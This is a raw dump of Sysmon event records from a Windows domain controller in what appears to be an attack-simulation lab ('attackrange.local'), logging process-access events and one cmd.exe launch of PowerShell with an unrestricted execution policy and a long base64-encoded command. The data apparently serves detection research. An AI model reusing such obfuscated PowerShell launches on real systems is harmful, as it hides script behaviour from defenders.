08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-167A-5F84-0803-000000007E01}48724596C:\Windows\system32\cmd.exe{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.189{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167A-5F84-0803-000000007E01}4872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0803-000000007E01}4872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 